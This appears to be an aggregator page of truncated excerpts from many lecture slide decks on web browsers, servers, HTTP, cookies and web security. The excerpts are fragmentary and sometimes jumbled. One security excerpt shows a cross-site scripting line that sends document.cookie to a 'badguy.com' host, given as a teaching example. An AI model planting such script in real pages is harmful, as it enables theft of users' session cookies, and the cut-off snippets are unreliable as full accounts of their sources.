Ppt on web browser and web server

State of Connecticut Department of Information Technology Single Sign On and The Identity Vault Presented by Edward Wilson.

of Connecticut Department of Information Technology Single Sign On and The Identity Vault Presented by Edward Wilson Enterprise Single/  Single Sign On Web Access DNS Access Gateway Identity Server Index Server Access Gateway Web Server URL Single Sign On User Authentication Web Browser Browser Header Record Outside Firewall Domain Name Server Access Gateway Identity Server Index Server Web Server The approved methodology for passing User data to the application. Browser Header Injection The alternative /


Web Database Programming Input Validation. User Input on the Web Web browser built-in mechanisms –HTML Forms HTTP POST method –Hyperlinks HTTP GET method.

&tid=6 Browser plug-ins –User needs to install plug-in software Difficult for universal deployment –E.g. flash, Java applet HTML Form Container for UI controls –E.g. button, checkbox, etc. Action: the URL of a program on the Web server that will /the server E.g. with PHP –More thorough, can check with data E.g. credit card Client-side validation –Validation is done by the browser E.g. with Javascript –More interactive, reduce network load Validation Strategy Validate field by field –Immediate stop and report/


Jackson, Web Technologies: A Computer Science Perspective, © 2007 Prentice-Hall, Inc. All rights reserved. 0-13-185603-0 Chapter 1 Web Essentials: Clients,

-Hall, Inc. All rights reserved. 0-13-185603-0 HTTP The information transmitted using HTTP is often entirely text Can use the Internet’s Telnet protocol to simulate browser request and view server response Jackson, Web Technologies: A Computer Science Perspective, © 2007 Prentice-Hall, Inc. All rights reserved. 0-13-185603-0 HTTP $ telnet www.example.org 80 Trying 192.0.34.166... Connected/


Terminology Tools: State of the Art and Practical Lessons James J. Cimino Department of Medical Informatics Columbia University New York, New York, USA.

Terminology Tools Medical Entities Dictionary KEE MED Editor MUMPS MED Editor MED Editor/Server Architecture Unix shared memory server Qrymed Accessmed Web MED browser Mainframe environment Web MED Editor Experience with Terminology Tools Medical Entities Dictionary KEE MED Editor MUMPS MED Editor MED Editor/Server Architecture Unix shared memory server Qrymed Accessmed Web MED browser Mainframe environment Web MED Editor Terminology Requirements for Controlled Data Entry (Chute, 1999) Word normalization/


World Wide Web1 Applications World Wide Web. 2 Introduction What is hypertext model? Use of hypertext in World Wide Web (WWW) – HTML. WWW client-server.

data item World Wide Web15 Other HTML Tags Parameters: tags have parameters or attributes –Keyword-value pairs e.g. Text Styling and Formatting –,,,,,,,,, etc. Special chars: <, ¼, etc. Linking – Ask Jeeves http://www.askjeeves.com –Internal Linking /requires separate TCP connection. This can introduce an overhead if browser has to download many items on the page from the same server. World Wide Web24 HTTP Browser (client) – Web server interaction follows the Hyper-Text Transfer Protocol (HTTP). HTTP/


Jackson, Web Technologies: A Computer Science Perspective, © 2007 Prentice-Hall, Inc. All rights reserved. 0-13-185603-0 Web Essentials: Clients, Servers,

-Hall, Inc. All rights reserved. 0-13-185603-0 HTTP The information transmitted using HTTP is often entirely text Can use the Internet’s Telnet protocol to simulate browser request and view server response Jackson, Web Technologies: A Computer Science Perspective, © 2007 Prentice-Hall, Inc. All rights reserved. 0-13-185603-0 HTTP $ telnet www.example.org 80 Trying 192.0.34.166... Connected/


Web Proxy Server Anagh Pathak Jesus Cervantes Henry Tjhen Luis Luna.

Proxy Server The Proxy server acts as both a server system and a client system. The proxy server uses the header fields passed to it by the browser without modification when it connects to the remote server. A complete proxy server should be able to communicate all the Web protocols, the most important ones being HTTP, FTP, Gopher, and WAIS. When a browser sends a request through a proxy server, the browser always/


How the web work Web Server Web browser DNS Server 1 2 3 4.

How the web work Web Server Web browser DNS Server 1 2 3 4 Web server Software installed on the operating system. Most popular web server : IIS (Internet Information Services) for Windows XP and Windows 2000,2003 Server. InstallingInstalling IIS –Control panel  Add/Remove programs  Add/Remove windows components  IIS ConfiguringConfiguring IIS –Control panel  Administrative tools  Internet Information Services After installing IIS the folder Inetpub Inetpub is installed /


Web-based Software Development - An introduction.

ODBC: Open Database Connectivity OLE-DB ADO: ActiveX Data Objects Web-based Software Development15 Representative Web technology ComponentsProgramming Tools - languages, technologies and APIs Web Browsers Internet Explorer, Netscape Navigator Web Servers Apache, IIS, … Applications (Servers) Oracle Application Server, WebSphere Advanced Server, WebLogic, Netscape Enterprise Server, … Database Servers Oracle Database Server, MS SQL Server, IBM DB2, SyBase, Informix, … Java Virtual Machines (JVMs), plug- ins/


Introduction to Web App Development Allen Day. Notes This is a training NOT a presentation Please ask questions https://tech.lds.org/wiki/Java_Stack_Training.

Java and HTML skills. – Installed LDSTech IDE (or other equivalent). – Installed App Server (such as Tomcat). Overview Basic Web App Architecture HTTP CGI Overview Understanding the role of servlets Maven Project Directory Structure Servlet Life Cycle Event Listeners Servlet Filters Servlet Response (Redirect, Request Dispatch) Basic Web App Architecture Request WWW Browser Web Server Response Basic Web App Architecture Request WWW Browser Web Server Response HTTP Request WWW Browser Web Server Response/


Confidential 1 Unified PC Maintenance Console (UPCMC) V4.0 PBX Web Manager Panasonic Communications Co., Ltd. Communication Network Company Edition 1.1.

22 3 Operation 3.3.1 Access from the same PC of Server. 3.3 Start programming from Web browser - Double-clicking the Task-tray icon of PBX Web Manager will start the Web browser. - Right-clicking the Task-tray icon of PBX Web Manager, and selecting “Open Browser” will start the Web browser. - In this case, URL of Web browser shows as followings. http://localhost:8181/INDEX.ASPX http://localhost:8181/INDEX/


Server Side Scripting Norman White. Where do we do processing? Client side – Javascript (embed code in html) – Java applets (send java program to run.

embedded code (Server side scripts) PhP, ASP, Cold Fusion, JSP (Java Server Pages), javascript In this case, the embedded code is executed as the web server sends the page out, not when the web browser goes to display the page. Advantages of Server Side Scripting over/ following question. Assuming the user and the web server are in the same time zone, and have synchronized time, how long (milliseconds) does it take to download a simple web page? Could you create a web page that answers this question using/


Web Services Chapter 21. Chapter Goals Understand the terminology of the WWW. Understand web clients (browsers). Understand web servers. Understand client.

standardized allowing a given web page to be rendered and viewed on a wide variety of web browsers. »Web pages can also include forms and buttons. These allow data to be entered into the page via the web browser and communicated back to the web server. Web Services Web Clients –Administrating WWW clients is primarily a matter of keeping up to date with browser and page content development. –At present, leading browsers are undergoing rapid development/


Web Security Borrowed from John Mitchell, Stanford.

= (when expires) ; secure = (only over SSL) Browser Server POST … Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state If expires=NULL: this session only Cookie authentication Browser Web ServerAuth server POST login.cgi Username & pwd Validate user auth=val Store val/what is allowed. ‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete. Input data validation and filtering Never trust client-side data Best: allow only what you expect Remove//


1 UTGB Shell An Open-Source Browser Framework for the Integration of Biological Data Taro L. Saito, Shin Sasaki, Budrul Ahsan and.

://utgenome.org/http://utgenome.org/ UTGB is self-containedUTGB is self-contained –Portable web server (Tomcat) –Database Engine (SQLite) –No installation of web server and database system is required. –UTGB is a ready-to-use development framework. UTGB Shell: An Open-Source Genome Browser Framework http://utgenome.org/ 12 UTGB is An Open-Source Program Source Code LicenseSource Code License –Apache License Version 2.0 Academic/


HTML Revisited. Learning Goals for Today 1.To develop your personal Web page 2.To upload your Web page to UMT’s Web server so that it becomes visible.

your user ID But first … How to develop personal Web page and make it available over the Internet through the URL http://sst.imt.edu.pk/fac/ihussain Requirements Text Editor Browser Server link URL page title HTML Hyper Text Markup Language Tags /Web browser displaying my index.htm My Web page is done! Problem! My Web page is visible only on my computer. It would be nice if it was also visible on the computers of all my friends and relatives as well. Solution! I need to upload my Web page to a Web server/


Rensselaer Polytechnic Institute Shivkumar Kalvanaraman, Biplab Sikdar 1 The Web: the http protocol http: hypertext transfer protocol Web’s application.

, Biplab Sikdar 2 The http protocol: more http: TCP transport service: client initiates TCP connection (creates socket) to server, port 80 server accepts TCP connection from client http messages (application-layer protocol messages) exchanged between browser (http client) and Web server (http server) TCP connection closed http is “stateless” server maintains no information about past client requests Protocols that maintain “state” are complex! past history (state) must be/


2: Application Layer1 Chapter 2 Application Layer Part 2: Web & HTTP These slides derived from Computer Networking: A Top Down Approach, 6 th edition.

sets browser: Web accesses via cache r browser sends all HTTP requests to cache  object in cache: cache returns object  else cache requests object from origin server, then returns object to client Goal: satisfy client request without involving origin server client Proxy server client HTTP request HTTP response HTTP request origin server origin server HTTP response 2: Application Layer22 More about Web caching r cache acts as both client and serverserver/


FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)

of Computer Science textbooks. FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA25 Use of Client-Server Paradigm Web server Makes set of pages available Uses port 80 Web client Called a browser Creates TCP connections to server Sends requests for items FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA26 Use of Client-Server Paradigm Primary protocol used between browser and server known as HyperText Transfer Protocol (HTTP) HTTP requests sent as text (ASCII) GET/


CP476 Internet Computing CGI1 Cookie –Cookie is a mechanism for a web server recall info of accessing of a client browser –A cookie is an object sent by.

lifetime –Every time the browser sends a request to the server that created the cookie, while the cookie is still alive, the cookie is included –The server can retrieve the information embedded in the cookie. Lecture 12. Cookies and Sessions Objective: to learn / item into his shopping card, the server add a cookie about the item to the client browser, when the shopper check out, the web server get all the cookies saved on the client browser. In such way, the server don’t have store any information selected/


Google App Engine Sessions and Cookies ae-09-session www.appenginelearn.com.

you are - account name - last access time You can close and reopen your browser and it is still there Temporary - used to identify your session It goes away when you close the browser Using Cookies to Support Sessions and Login / Logout Some Web sites always seem to want to know who you are! In The Server - Sessions In most server applications, as soon as we meet a new/


PROGRAMMING IN VISUAL BASIC.NET CREATING YOUR FIRST WEB APPLICATION Bilal Munir Mughal 1 Chapter-3.

into a DLL file can be installed on your Web server. These classes, which contain business logic and database functions, can be called from ASP.NET pages or exposed as Web services.  Client-Side Scripting – VBScript, a subset of the Visual Basic language, can be used to execute code inside of the users browser after the Web page has been delivered. This allows you to create/


Architecture for a Web-Based Clinical Information System that Keeps the Design Open and the Access Closed James J. Cimino, Soumitra Sengupta, Paul D. Clayton,

Authentication: –User ID and password –SecurID token –Secure Socket Layer encryption –Single-use "log on" form –Session ID –Short time-out –Long time-out –Log out User Interface Design Netscape Navigator 4.x Constant set of main function classes "Sub-buttons" are customizable Low-tech, minimal “flash” Data Entry Review Advice Education Comments Help Logout patcis.cgi Web Server Web Browser Data Entry Review Advice/


1 Introduction to Information Security 0368-3065, Spring 2015 Lecture 10: TCP/IP security (2/2), Web security Eran Tromer.

security properties we require for stand-alone applications 12 Network Attacker Intercepts and controls network communication Browser user (client) System Network adversary 13 Web Attacker Sets up malicious site visited by victim; no control of network System Website adversary Browser user (client) 14 Website attacker –Control attacker.com Legitimately By taking over server (control hijacking, authentication) DNS attack (next lecture) –Can obtain SSL/TLS certificate/


The Internet.

connected to the internet through your ISP. It checks the ISP’s DNS server to see what IP address matches up with the domain name and where it is located. The request is sent to the server at that IP address and the web page is sent back to your browser. Putting Your Website Online You know how it works, you’ve made a website, now/


THE INFRASTRUCTURE FOR E-COMMERCE

- J. Galván HOW DOES JAVA WORK? BA 572 - J. Galván EVOLUTION OF THE WWW Business Drivers Facilitate personalization Enable transactions Allow interactivity between browser and server Facilitate personalization Support multiple browsing devices Better organize and retrieve Web content Support Business-to-Business applications BA 572 - J. Galván PERSONALIZED INTERACTION Business motivation: Low cost medium for gathering information from customers to allow Personalized/


todays class morning: afternoon: how we got here HTTP overview

Using iframes sparingly Simplifying CSS Selectors Understanding Ajax performance Doug Crockford Writing efficient JavaScript Nicholas Zakas Creating responsive web apps Ben Galbraith, Dion Almaer Scaling with Comet Dylan Schiemann Going Beyond Gzipping Tony Gentilcore Optimizing Images/ break EFWS 5-8 performance analysis state of performance Sharding Dominant Domains HTTP/1.1 and older browsers 2 connections per server based on name, not IP includes IE 6,7 "domain sharding" intentionally splitting resources/


Nick Feamster CS 6262 Spring 2009

open( “http://badguy.com?cookie = ” + document.cookie ) What if user clicks on this link? Browser goes to victim.com/search.php Victim.com returns Results for … Browser executes script: Sends badguy.com cookie for victim.com 4 So What? Why would user click on such/reflected”) Data provided by a Web client is used by server-side scripts to generate a page for that user Persistent (“stored”) Data provided to an application is first stored and later displayed to users in a Web page Potentially more serious if /


Mike Ter Louw V.N. Venkatakrishnan University of Illinois at Chicago

inference) Server: Detect and prevent reflected scripts Client: Detect and prevent data leaks Related work (cont.) Server and browser collaboration (BEEP, DSI, Noncespaces) Server: Identify policy regions and declare policies Client: Enforce policies over policy regions Require browser changes Systems supporting benign scripts in user-created content Caja, Web Sandbox, Facebook Complimentary to our approach Conclusion Cross-site scripting attacks can be prevented entirely if browsers and web applications/


Web Designs & Languages

together. They have communication between each other. Decentralized design that there is no centralized body controls how the Internet functions. The Web is a collection of documents that are interconnected by hyper-links. These documents are accessed by web browsers and provided by web servers. CSC1720 – Introduction to Internet All copyrights reserved by C.C. Cheung 2003. All copyrights reserved by C.C. Cheung 2003. Internet/


Web Page Concept and Design :

1 What is a web server? Web server computer running application software that listens and responds to a client computer’s request made through a web browser machine that hosts web pages and other web documents provides web documents and other online services using HTTP UNESCO ICTLIP Module 6. Lesson 1 UNESCO ICTLIP Module 6. Lesson 1 Web servers Apache - most popular open source server software on the Web iServer – application / web server written entirely in Java Microsoft/


1 How to provide access to information through the Internet and the WWW? Paul Nieuwenhuysen Vrije Universiteit Brussel Information and Library Science,

in another folder using that program for web development and see what happens using a browser. **** 74 !? Question !? Explain how a program like Microsoft FrontPage allows renaming and relocating a file or folder, in such a way that web hyperlinks are not broken. **** 75 Programs for web site development: the problem of mixed case in a web Unix-based server computers, including web servers on such computers, make a distinction/


Enhancing Web Browsing Security on Public Terminals Using Mobile Composition Richard Sharp & Anil Madhavapeddy, Roy Want & Trevor Pering ACM MobiSys08.

Encrypted message contains a set of (, ) Avoiding Replay AttacksAvoiding Replay Attacks –Nonce & timestamp –Phones browser automatically copies this into response message –Then web application checks It has not seen the nonce before The response is timely 16 Performance Evaluation Measured the latency between server and deviceMeasured the latency between server and device –Message is encrypted using AES with 1024-bit key & Base64 –Message length is 850/


ASP.NET Intro An introduction to the languages and communication of an ASP.NET system.

item is selected: function output() { alert (“item selected”); } … Browser view: BROWSER SIDE Retrieving a Static Web Page from the Web Server Client: Web BrowserServer: Basic Web Server 1. Request for an HTML page2. Receives request 3. Retrieves file from hard disk drive 4. Receives and displays web page 4. Returns file to browser Retrieving a Dynamic ASPX page from the Web Server Client: Web Browser Server: Microsoft IIS Server 1. Request for an ASPX page 2. Receives/


Microsoft Research March 20, 2000 A Programming Language for Developing Interactive Web Services Claus Brabrand BRICS, University of Aarhus, Denmark.

implementation –Rely on syntax restrictions and analysis information Microsoft Research March 20, 2000 Goals Lower development time (= cost): Targeted at Web services Low-level  high-level Increase functionality: Compiler does “the dirty work” Increase reliability: Catch errors during development –Runtime errors  Compile-time errors Microsoft Research March 20, 2000 Assumptions “Rules of engagement”: –Lowest common denominator Any browser/Web server combination –Only include basic primitives/


Introduction to ASP.NET

Page.Request to Retrieve Form Values and Server Variables Figure 1-8 Using Page.Request to retrieve form values and server variables The ASP.NET Page.Response Property The Response object is used to send information to the browser Some of this information identifies the server and server properties For example, the IP address of the server, and the name and version number of the Web server software are sent to the client/


HTTP Request/Response Process 1.Enter URL (http://server.com) in your browser’s address bar. 2.Your browser uses DNS to look up IP address of server.com.

9.MySQL database returns query results 10.PHP interpreter uses result to generate/output web page 11.server.com returns the web page to your IP address 12.Your browser receives and renders the web page Client Chrome Web Browser Server Apache Web Server Request with URL and client IP Response with HTML document Database MySQL DBMS Server URL is a PHP program PHP program connects to MySQL Query results are sent PHP/


U.S. Department of Commerce Web Advisory Group Implementing Machine Readable Privacy Requirements of the E-Gov Act.

of P3P is the Compact Policy An optional performance optimization for P3P compliance (but required by some browsers to determine the web sites privacy practices concerning cookies). summarizes the privacy policy relating to cookies only, and provides browsers with policy information. may be implemented at server level or web- page level. Sample CP Sample CP – NOI NID ADMa OUR LEG DSP COR NOI – No personally identifiable/


DEV034 -Web Applications, Introduction

side Fat Client UI Layer Light Client Client interface Business Layer Business Data Layer Data Data Server side Introduction – classic dialog between the web-client and the server Presentation title Introduction – classic dialog between the web-client and the server The classical exchange between a web client (web browser) and a web-server Web browser URL http get HTTP server Tcp/ip http answer & html page The user clicks on a hyperlink (or type the URL/


LIS650part 0 Introduction to the course and to the World Wide Web Thomas Krichel 2011-02-03.

http, the client is often called a web browser. It is a tool that a user uses to view web pages. The server is usually called a web server. If you want to provide web pages for the general public you need a web server to store the pages. This is a machine that has special software. That software runs day and night to answer requests that come from clients/


1 A COMPARISON OF CLOUD STORAGE SERVICES. 2 Web location for this presentation: Click on “Meeting Notes”

Adapter or Wireless Cellular Transceiver Optional Operating System-Specific Program or App Provided by the Cloud Storage Service Web Browser Add-on Provided by Cloud Storage Service or HTML Download and Upload 9 Server Farms Operated by a Web- based Cloud Storage Service Your Internet Connection 10 Web Browser Internet Connection Your Computer, Tablet, PDA, or Cell Phone Ethernet or WiFi Adapter or Wireless Cellular Transceiver Optional/


Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.

of Web browsers Install a Web browser Identify the components of Web addresses Describe the functioning of a Web browser Identify considerations in selecting a browser Use various browsing techniques Define elements of a Web browser Configure Web browser preferences Identify the function of proxy servers Troubleshoot common Internet client problems Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Basic Functions of Web Browsers Provide a way for users to access and navigate Web pages/


1 Web Security: part 1. Vulnerability Stats: web is “winning” Source: MITRE CVE trends Majority of vulnerabilities now found in web software.

.net/xforce/xfdb/4621 41 Solution When storing state on browser, MAC data using server secret key.NET 2.0: – System.Web.Configuration.MachineKey  Secret web server key intended for cookie protection – HttpCookie cookie = new HttpCookie(name, val); HttpCookie encodedCookie = HttpSecureCookie.Encode (cookie); – HttpSecureCookie.Decode (cookie); 42 Frames and frame busting This text is ignored by most browsers. Frames Embed HTML documents in other documents Frame Busting/


1 ISA 562 Information Systems Theory and Practice 10. Digital Certificates.

for authenticity and accepted if the/SERVER-SIDE MASQUERADING Bob Web browser www.host.com Web server Server-side SSL Ultratrust Security Services www.host.com 30 SERVER-SIDE MASQUERADING Bob Web browser www.host.com Web server Server-side SSL Ultratrust Security Services www.host.com Mallory’s Web server BIMM Corporation www.host.com Server-side SSL 31 SERVER-SIDE MASQUERADING Bob Web browser www.host.com Web server Server-side SSL Ultratrust Security Services www.host.com Mallory’s Web server Server/


LIS650part 0 Introduction to the course and to the World Wide Web Thomas Krichel 2011-04-21.

http, the client is often called a web browser. It is a tool that a user uses to view web pages. The server is usually called a web server. If you want to provide web pages for the general public you need a web server to store the pages. This is a machine that has special software. That software runs day and night to answer requests that come from clients/


© Minder Chen, 1998-2002 ASP - 1 Active Server Pages Minder Chen, Ph.D.

no manual compiling or linking of programs required. Object-oriented and extensible with ActiveX server components. ASP supplies scripting engines for Microsoft® Visual Basic® Scripting Edition (VBScript) and JScript. You can incorporate sophisticated functionality using ActiveX server components, formerly known as Automation servers, to process data and generate useful information. ASP-generated content is compatible with standard Web browsers. © Minder Chen, 1998-2002 ASP - 11 ASP Scripting The/


Lesson 4: Web Browsing.

functions of Web browsers Install a Web browser Identify the components of Web addresses Describe the functioning of a Web browser Identify considerations in selecting a browser Use various browsing techniques Define elements of a Web browser Configure Web browser preferences Identify the function of proxy servers Troubleshoot common Internet client problems CIW Lesson 4 MBSH Mr. Schmidt Basic Functions of Web Browsers Provide a way for users to access and navigate Web pages Display Web pages properly/


1 Lecture 1 Web Essentials: Clients, Servers, and Communication.

., increase font sizes) –Display raw HTML and HTTP header info (e.g., Last- Modified) –Choose browser themes (skins) –View history of web addresses visited –Bookmark favorite pages for easy return 62 Web Browsers Additional functionality: –Execution of scripts (e.g., drop-down menus) –Event handling (e.g., mouse clicks) –GUI for controls (e.g., buttons) –Secure communication with servers –Display of non-HTML documents (e.g/


CIS 5930-04 – Spring 2001 Instructors: Geoffrey Fox, Bryan Carpenter Computational Science and.

companies can control versions of browser and Java development software deployed. But on the Internet, where many incompatible versions abound, the future of traditional applets is somewhat unclear. dbc@csit.fsu.edu105 Applets in this Course  Caveats notwithstanding, an applet is one natural way to provide a Web front-end to a stand-alone server program, especially if the server is implemented as an RMI/


LIS650part 0 Introduction to the course and to the World Wide Web Thomas Krichel 2012-01-17.

http, the client is often called a web browser. It is a tool that a user uses to view web pages. The server is usually called a web server. If you want to provide web pages for the general public you need a web server to store the pages. This is a machine that has special software. That software runs day and night to answer requests that come from clients/


Ads by Google